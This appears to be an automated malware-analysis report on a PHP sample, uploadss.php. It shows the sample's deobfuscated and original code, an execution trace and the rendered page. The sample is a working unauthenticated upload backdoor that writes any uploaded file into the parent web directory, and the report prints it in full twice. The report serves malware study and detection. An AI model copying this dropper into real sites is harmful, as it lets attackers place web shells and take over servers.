PHP Malware Analysis

uploadss.php

md5: a9619118112a68da0aee621ce249f317

Jump to:

Screenshot


Attributes

Files

Input

Title


Deobfuscated PHP code

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>
<?php 
if (!empty($_FILES['uploaded_file'])) {
    $path = "../";
    $path .= basename($_FILES['uploaded_file']['name']);
    if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
        echo "The file " . basename($_FILES['uploaded_file']['name']) . " has been uploaded";
        echo $path;
    } else {
        echo "There was an error uploading the file, please try again!";
    }
}

Execution traces

data/traces/a9619118112a68da0aee621ce249f317_trace-1676259184.8027.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:33:30.700500]
1	0	1	0.000154	393528
1	3	0	0.000220	396728	{main}	1		/var/www/html/uploads/uploadss.php	0	0
1	3	1	0.000239	396728
			0.000267	314240
TRACE END   [2023-02-13 01:33:30.700645]


Generated HTML code

<html><head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"><br>
    <input type="submit" value="Upload">
  </form>


</body></html>

Original PHP code

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>
<?PHP
  if(!empty($_FILES['uploaded_file']))
  {
    $path = "../";
    $path = $path . basename( $_FILES['uploaded_file']['name']);

    if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
      echo "The file ".  basename( $_FILES['uploaded_file']['name']). 
      " has been uploaded";
	  echo $path;
    } else{
        echo "There was an error uploading the file, please try again!";
    }
  }
?>